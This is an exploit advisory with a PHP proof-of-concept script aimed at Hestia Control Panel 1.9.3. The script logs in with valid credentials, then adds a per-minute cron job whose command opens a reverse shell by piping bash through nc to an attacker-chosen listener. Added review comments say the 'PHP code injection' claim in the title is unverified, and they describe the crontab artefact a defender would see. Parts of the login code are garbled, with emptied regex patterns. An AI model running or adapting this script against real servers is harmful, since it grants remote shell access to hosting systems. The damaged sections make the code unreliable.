============================================================================================================================================= | # Title : Hestia Control Panel 1.9.3 PHP code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://hestiacp.com/ | ============================================================================================================================================= POC : [+] Dorking in Google or another search engine. [+] Code Description: This script is a PHP proof of concept that targets the cron job feature of a specific server: after logging in, it adds a cron entry that runs a command remotely. (Related: https://packetstorm.news/files/id/189606/ ; Related CVE numbers: none listed) . [+] Save the code as poc.php. [+] Usage: php script.php [+] PayLoad : /', $token_response, $matches)) { echo "Failed to retrieve login token\n"; return [null, null]; } $token = $matches[1]; $postData = http_build_query([ 'token' => $token, 'user' => $username ]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url/login/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $username_response = curl_exec($ch); curl_close($ch); if (!preg_match('//', $username_response, $matches)) { echo "Failed to retrieve password token\n"; return [null, null]; } $token = $matches[1]; $postData = http_build_query([ 'token' => $token, 'password' => $password ]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url/login/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); $password_response = curl_exec($ch); curl_close($ch); if (strpos($password_response, 
'login') !== false) {
    echo "Login failed!\n";
    return [null, null];
}
echo "Login successful!\n";
return ['cookies.txt', $token];
}

/**
 * Adds a cron entry through the panel's own /add/cron/ form, reusing the
 * session cookie jar and the token that login() obtained.
 *
 * The submitted v_cmd is a shell one-liner that attaches an interactive bash
 * to an outbound nc connection to $listener_ip:$listener_port; the five
 * schedule fields are all '*', so the entry is due every minute. For
 * defenders, the artefact this leaves is a crontab line containing mkfifo
 * and nc, created by an authenticated panel user: the user's crontab on the
 * host (and whatever cron listing the panel exposes) is where it shows up.
 *
 * NOTE(review): this is the panel's normal "add cron job" request sent with
 * valid credentials. Nothing on this page shows the panel executing
 * attacker-supplied PHP, so the "PHP code injection" label in the title is
 * unverified; the request depends on already holding a panel login.
 *
 * TLS peer verification is switched off for the request
 * (CURLOPT_SSL_VERIFYPEER false), so the script will also talk to a panel
 * presenting an untrusted certificate.
 *
 * @param string $url           panel base URL; "$url/add/cron/" is built by plain concatenation
 * @param string $cookieFile    cookie jar path returned by login()
 * @param string $listener_ip   host the cron command connects back to
 * @param string $listener_port port the cron command connects back to
 * @param string $token         token returned by login()
 * @return bool true when the literal string 'cron' occurs anywhere in the
 *              response body; this is a substring match on the whole page,
 *              not a check of the panel's actual result
 */
function create_cron($url, $cookieFile, $listener_ip, $listener_port, $token) {
    $cron_payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $listener_ip $listener_port >/tmp/f";
    // Form fields of the panel's add-cron page; 'ok' => 'Add' is the submit button value.
    $postData = http_build_query([
        'token' => $token,
        'ok' => 'Add',
        'v_cmd' => $cron_payload,
        'v_min' => '*',
        'v_hour' => '*',
        'v_day' => '*',
        'v_month' => '*',
        'v_wday' => '*'
    ]);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url/add/cron/");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
    // Session comes from the jar that login() wrote (CURLOPT_COOKIEJAR 'cookies.txt').
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieFile);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $cron_response = curl_exec($ch);
    curl_close($ch);
    // Substring match on the response body; see the @return note above.
    if (strpos($cron_response, 'cron') !== false) {
        echo "Cronjob successfully generated!\n";
        return true;
    }
    echo "Failed to create cronjob.\n";
    return false;
}

// ---- entry point -----------------------------------------------------------
// Five positional arguments are required ($argc counts the script name too).
// NOTE(review): the argument placeholders after "php script.php" in the usage
// text appear to have been lost in page extraction (probably angle-bracketed
// names); the reads from $argv[1]..$argv[5] below fix the order as
// url, username, password, listener ip, listener port.
if ($argc < 6) {
    echo "Usage: php script.php \n";
    exit(1);
}
// The ?? '' fallbacks cannot trigger after the $argc check; kept as written.
$url = $argv[1] ?? '';
$username = $argv[2] ?? '';
$password = $argv[3] ?? '';
$listener_ip = $argv[4] ?? '';
$listener_port = $argv[5] ?? '';
// login() returns [null, null] on every failure path visible on this page,
// so $cookieFile doubles as the success flag.
list($cookieFile, $token) = login($url, $username, $password);
if ($cookieFile) {
    if (create_cron($url, $cookieFile, $listener_ip, $listener_port, $token)) {
        // The script ends right after this message; nothing in it listens for
        // the connection, that is left to whatever runs on the listener side.
        echo "Cronjob created, waiting for connection...\n";
    }
}
// ---- advisory trailer (not part of the script) -----------------------------
Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================